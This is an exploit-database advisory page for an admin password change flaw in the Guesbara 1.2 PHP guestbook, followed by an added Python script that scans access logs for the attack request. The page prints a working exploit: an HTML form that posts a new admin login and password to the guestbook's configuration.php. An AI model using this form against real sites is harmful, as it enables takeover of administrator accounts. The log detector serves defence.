Guesbara 1.2 - Administrator Password Change

Vulnerability ID 1056197 Vulnerability type
Published 2007-03-19 Updated 2007-03-19
CVE ID N/A CNNVD-ID N/A
Platform PHP CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/29755
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/23029/info

Guesbara is prone to a vulnerability that may permit attackers to change the administrative password.

Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. 

<html>
<title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>
<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr>
<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td colspan=2 align=center>
<p>
<input type='submit' name='submit' value='Zachowaj'>
</p>
<p>by Kacper </p>
<p>for</p>
<p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p> </p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>
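
Added example (not part of the original advisory or of the Guesbara code): a Python check that scans web-server access logs for the request the form above sends, a POST to admin/configuration.php?action=saveconfig&zapis=ok, and reports those whose Referer is missing or off-site. The combined log format, the host name guestbook.example and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def is_saveconfig(method, target):
    """True for a POST to .../admin/configuration.php?action=saveconfig&zapis=ok."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    return (method == "POST"
            and url.path.lower().endswith("/admin/configuration.php")
            and query.get("action") == ["saveconfig"]
            and query.get("zapis") == ["ok"])

def suspicious_saveconfig(lines, site_host):
    """Return (ip, timestamp, status, referer) for saveconfig POSTs whose
    Referer is missing or names a host other than site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_saveconfig(m["method"], m["target"]):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host != site_host.lower():
            hits.append((m["ip"], m["ts"], int(m["status"]), m["referer"]))
    return hits

# Constructed sample lines (documentation IP ranges and .example hosts).
REQ = '"POST /guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok HTTP/1.1"'
SAMPLE = [
    '198.51.100.7 - - [19/Mar/2007:10:01:12 +0000] ' + REQ +
    ' 200 512 "http://guestbook.example/guestbook_path/admin/" "Mozilla/5.0"',
    '203.0.113.45 - - [19/Mar/2007:10:07:40 +0000] ' + REQ +
    ' 200 512 "http://other.example/form.html" "Mozilla/5.0"',
    '203.0.113.46 - - [19/Mar/2007:10:09:02 +0000] ' + REQ + ' 200 512 "-" "-"',
    '198.51.100.7 - - [19/Mar/2007:10:11:30 +0000] '
    '"GET /guestbook_path/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_saveconfig(SAMPLE, "guestbook.example"):
        print(hit)
```

Referer is client-controlled, so treat a hit as a lead for reviewing the stored admin login and e-mail, not as proof either way.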